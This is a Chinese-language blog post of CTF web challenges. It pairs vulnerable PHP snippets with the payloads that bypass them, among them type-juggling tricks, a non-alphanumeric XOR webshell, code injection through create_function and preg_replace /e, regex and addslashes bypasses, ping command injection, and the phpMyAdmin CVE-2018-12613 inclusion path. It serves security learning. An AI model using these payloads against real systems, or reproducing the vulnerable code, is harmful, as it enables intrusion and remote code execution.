CTF——web安全中的一些绕过
function check($number)
{
$one = ord('1');
$nine = ord('9');
for ($i = 0; $i < strlen($number); $i++)
{
$digit = ord($number{$i});
if ( ($digit >= $one) && ($digit <= $nine) )
{
return false;
}
}
return $number == '11259375';
}
0xabcdef
用11259375的16进制形式0xabcdef
1 $num=$_GET['num'];
if(!is_numeric($num))
{
echo $num;
if($num==1)
echo 'flag{**********}';
}
?num=1xxx
不能用16进制形式0x1,前面加0形式0001,或者科学计数法形式0e0,因为都会被判断为数字。但可以提交1xxx,后面跟上除了数字,点(两个点可以:1..)以外任意字符即可,php用==比较字符串和数字时,会把字符串隐式转换为数字,如果字符串中有非数字字符,只取最前面的数字,例如"1x"=1,"22asd"=22,"qwe123"=0
1 <?php function getFlag()
{
echo "flagxxxxxxx";
} if(isset($_GET['code']))
{
$code = $_GET['code']; if(strlen($code)>40)
{
die("Long.");
}
if(preg_match("/[A-Za-z0-9]+/",$code))
{
die("NO.");
} @eval($code);
}
//$hint = "php function getFlag() to get flag";
?>
?code=$_="<%)},?'"^"[@];@^@";$_();
两句php代码,第一句 $_="<%)},?'" ^ "[@];@^@"; 是把两个字符串异或运算结果赋给$_变量," <%)},?' " 这个含7个字符的字符串和 " [@];@^@ " 异或的结果就是getFlag,然后第二句php代码 $_(); 就相当于getFlag();
若是过滤了下划线,则 ${"}"^";"}= "<%)},?'" ^ "[@];@^@"; ${"}"^";"}();
详见:
https://www.leavesongs.com/penetration/webshell-without-alphanum.html
https://www.cnblogs.com/ECJTUACM-873284962/p/9433641.html
1 <?php function flag()
{
echo "flag{xxxxxxx}";
} $sort_by = $_GET['sort_by'];
$sorter = 'strnatcasecmp';
$databases=array('1234','4321');
$sort_function = ' return 1 * ' . $sorter . '($a["' . $sort_by . '"], $b["' . $sort_by . '"]);';
usort($databases, create_function('$a, $b', $sort_function));
?sort_by=1"], $b["1"]);}flag();//
usort里构造了一个匿名函数,参数为$a,$b,函数体为$sort_function,这个匿名函数相当于是这样写的
function anonymouse($a,$b){ 函数体($sort_function) }
1 <?php
function flag()
{
echo "flag{xxxxx}";
} $id=$_GET['id'];
$str2='echo '.$a.'test'.$id.";";
echo $str2;
echo "<br/>";
echo "==============================";
echo "<br/>";
$f1 = create_function('$a',$str2);
echo "<br/>";
echo "==============================";
?id=1;}flag();// 或者 /?id=1;}flag();/*
原理同上
1 <?php
if(!is_array($_GET['test'])){exit();}
$test=$_GET['test'];
for($i=0;$i<count($test);$i++){
if($test[$i]==="admin"){
echo "error";
exit();
}
$test[$i]=intval($test[$i]);
}
if(array_search("admin",$test)===0){
echo "flag";
}
else{
echo "false";
}
?>
?test[]=0
传入test[]=0,那么test就是一个数值型的数组,即 Array ( [0] => 0 ) ,array_search() 在test数值型数组中查找 "admin" 这个字符串的时候,首先会把字符串转换为数字,转换规则具体看本文第二个示例,所以 "admin" 变成了0,array_search()如果查找成功就会返回其键名,test数组中0的键名是0,而0===0。
if (!preg_match('/^-?[0-9]+$/m', $_GET["id"])) {
die("ERROR INTEGER REQUIRED");
}
123\nPAYLOAD;
PAYLOAD\n123;
PAYLOAD\n123\nPAYLOAD
sql注入中的一个绕过,该正则由于m修饰符,将只验证其中一行只包含整数
<?php
function complexStrtolower($regex,$value){
return preg_replace('/('.$regex.')/ei','strtolower("\\1")',$value);
} foreach($_GET as $regex =>$value){
echo complexStrtolower($regex,$value);
} function flag(){
echo 'flag{xxxxxxx}';
}
?>
?%5cS*=${flag()}
\S 匹配任意非空字符,\1 是正则中的反向引用
详见:
1 <?php
$str = addslashes($_GET['option']);
$file = file_get_contents('xxxxx/option.php');
$file = preg_replace('|\$option=\'.*\';|',"\$option='$str';",$file);
file_put_contents('xxxxx/option.php',$file); ?>
解法1:
?option=%5c%27;phpinfo();//
输入\';phpinfo();// ,\'经过addslashes()之后变为\\\',随后preg_replace会将两个连续的\合并为一个,也就是将\\\'转为\\',这样我们就成功引入了一个单引号,闭合上文注释下文,中间加入要执行的代码即可。此时option.php内容就为 $option='\\';phpinfo();//';
解法2:
?option=%27;%0a phpinfo();//
?option=xx
(. 匹配除换行符 \n 之外的任何单字符)
提交两次,第一次提交后文件内容为:
<?php
$option='\';
phpinfo();//';
第二次提交后为:
<?php
$option='xx';
phpinfo();//';
解法3:
?option=;phpinfo();
?option=%00
\0: 正则中的反向引用,为 “匹配到的全部内容”
提交两次,第一次提交后文件内容为:
<?php
$option=';phpinfo();';
第二次提交后为:
<?php
$option='$option=';phpinfo();';';
详见:
1 <?php
if(!preg_match('/^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$/',$_GET['ip'])){
header("Location: ?ip=127.0.0.1");
}
system("ping -c 2".$_GET['ip']);
?>
?ip=127.0.0.1|ls
即使浏览器将被重定向,此函数也不会停止执行流程,并且脚本仍将使用危险的参数完成运行,但不能在浏览器中轻易地利用此漏洞,因为浏览器将遵循重定向,并且不会显示正在重定向的页面
可以用burp抓包重放
1 <?php
include 'f1agi3hEre.php';
if ("POST" == $_SERVER['REQUEST_METHOD'])
{
$password = $_POST['password'];
if (0 >= preg_match('/^[[:graph:]]{12,}$/', $password))
{
echo 'Wrong Format';
exit;
}
while (TRUE)
{
$reg = '/([[:punct:]]+|[[:digit:]]+|[[:upper:]]+|[[:lower:]]+)/';
if (6 > preg_match_all($reg, $password, $arr))
break;
$c = 0;
$ps = array('punct', 'digit', 'upper', 'lower');
foreach ($ps as $pt)
{
if (preg_match("/[[:$pt:]]+/", $password))
$c += 1;
}
if ($c < 3) break;
if ("42" == $password) echo $flag;
else echo 'Wrong password';
exit;
}
}
highlight_file(__FILE__);
?>
password=%2b42.000000e0 (url编码 + %2b)
php用==比较数值型字符串,会转换为数值进行比较大小。'+42.000000e0' =='42'
浮点型结构:
LNUM [0-9]+
DNUM ([0-9]*[\.]{LNUM}) | ({LNUM}[\.][0-9]*)
EXPONENT_DNUM [+-]?(({LNUM} | {DNUM}) [eE][+-]? {LNUM}) 整型结构:
decimal : [1-9][0-9]*
| 0 hexadecimal : 0[xX][0-9a-fA-F]+ octal : 0[0-7]+ binary : 0b[01]+ integer : [+-]?decimal
| [+-]?hexadecimal
| [+-]?octal
| [+-]?binary
参考自PHP官方文档:PHP:Float
<?php
class emmm
{
public static function checkFile(&$page)
{
$whitelist = ["source"=>"source.php","hint"=>"hint.php"];
if (! isset($page) || !is_string($page)) {
echo "you can't see it";
return false;
} if (in_array($page, $whitelist)) {
return true;
} $_page = mb_substr(
$page,
0,
mb_strpos($page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
} $_page = urldecode($page);
$_page = mb_substr(
$_page,
0,
mb_strpos($_page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
}
echo "you can't see it";
return false;
}
} if (! empty($_REQUEST['file'])
&& is_string($_REQUEST['file'])
&& emmm::checkFile($_REQUEST['file'])
) {
include $_REQUEST['file'];
exit;
} else {
echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
}
?> //flag in ffffllllaaaagggg
index.php?file=hint.php%253f/../ffffllllaaaagggg
https://www.jianshu.com/p/0d75017c154f
(phpmyadmin4.8.1远程文件包含漏洞 CVE-2018-12613)
/*****************不定时长期更新****************/
CTF——web安全中的一些绕过的更多相关文章
- 31C3 CTF web关writeup
0x00 背景 31c3 CTF 还是很人性化的,比赛结束了之后还可以玩.看题解做出了当时不会做的题目,写了一个writeup. 英文的题解可以看这:https://github.com/ctfs/w ...
- 在iOS应用程序中使用Frida绕过越狱检测
阿里聚安全在之前的三篇博客中介绍了利用Frida攻击Android应用程序,整个过程仿佛让开发者开启上帝视角,在本篇博客中,我们将会介绍在iOS应用程序中使用Frida绕过越狱检测.即使 ...
- web开发中的安全问题
web开发中很多东西由前段来负责判断,比如常见的邮箱 电话号码,前端判断到不是一个正确的格式,在你点击提交时候提示你格式填错了,然后不请求后端php,直到你填写正确的格式为止.这种其实可以修改js或者 ...
- Selenium中使用Cookies绕过登录
在使用selenium测试后台时常常每个流程都需要走登录流程,这样自然比较浪费时间.如果遇到登录需要输入验证码等情况,就可能出师未捷身先死. 在Web应用中,登录状态通常是通过Cookie中对应的se ...
- java: web应用中不经意的内存泄露
前面有一篇讲解如何在spring mvc web应用中一启动就执行某些逻辑,今天无意发现如果使用不当,很容易引起内存泄露,测试代码如下: 1.定义一个类App package com.cnblogs. ...
- 【初码干货】使用阿里云对Web开发中的资源文件进行CDN加速的深入研究和实践
提示:阅读本文需提前了解的相关知识 1.阿里云(https://www.aliyun.com) 2.阿里云CDN(https://www.aliyun.com/product/cdn) 3.阿里云OS ...
- web.xml中welcome-file-list的作用
今天尝试使用struts2+ urlrewrite+sitemesh部署项目,结果发现welcome-file-list中定义的欢迎页不起作用: <welcome-file-list> & ...
- web.xml中load-on-startup的作用
如下一段配置,熟悉DWR的再熟悉不过了:<servlet> <servlet-name>dwr-invoker</servlet-name> <ser ...
- Entity Framework 6 Recipes 2nd Edition(9-3)译->找出Web API中发生了什么变化
9-3. 找出Web API中发生了什么变化 问题 想通过基于REST的Web API服务对数据库进行插入,删除和修改对象图,而不必为每个实体类编写单独的更新方法. 此外, 用EF6的Code Fri ...
随机推荐
- Spring(001)-Hello Spring
Spring系列第一篇,先通过Spring实现一个Hello Spring程序. 访问 https://start.spring.io/ 开始spring代码骨架的构建. 输入mvn坐标 加入web和 ...
- NOIP 2003 乒乓球
洛谷 P1042 乒乓球 https://www.luogu.org/problemnew/show/P1042 JDOJ 1363: [NOIP2003]乒乓球 T1 https://neooj.c ...
- 点云深度学习的3D场景理解
转载请注明本文链接: https://www.cnblogs.com/Libo-Master/p/9759130.html PointNet: Deep Learning on Point Sets ...
- cd1101d 树形dp
cd1101d 简单dp 链接 codeforces 思路 所有数的质因数存下来,最多6个. 然后\(f[i][j][0/1]\)表示i子树内链gcd为j的i是否为链头. 暴力转移就行了 代码 #in ...
- [LeetCode] 24. Swap Nodes in Pairs 成对交换节点
Given a linked list, swap every two adjacent nodes and return its head. You may not modify the value ...
- Ubuntu安装微信、钉钉等各种windows软件
详见这个博客,用sudo dpkg -i 安装软件时,如果出现错误,是因为缺少安装依赖关系,用下面的命令解决: sudo apt-get install -f
- windows 排查javaWeb程序占用CPU过高问题(可追踪到问题代码所在行)
1.情景展示 java虚拟机占用这么高的CPU,肯定不正常! 2.原因分析 第一个是tomcat,正在运行java项目: 第二个是eclipse,因为eclipse的运行依赖于java. 现在的问 ...
- 重启服务器后Docker容器暴露的端口外网突然访问不了!!
*:first-child { margin-top: 0 !important; } .markdown-body>*:last-child { margin-bottom: 0 !impor ...
- 手撕代码:统计1到n二进制数中1出现的总次数
题目描述: 互娱手撕代码题. 统计从1到n这n个数的二进制表示中1出现的次数. 思路分析: 思路一:直接的做法是从1遍历到n,对于每个数和1做与操作,之后,对于这个数不断做右移操作,不断和1做与操作, ...
- 【RS】Deep Learning based Recommender System: A Survey and New Perspectives - 基于深度学习的推荐系统:调查与新视角
[论文标题]Deep Learning based Recommender System: A Survey and New Perspectives ( ACM Computing Surveys ...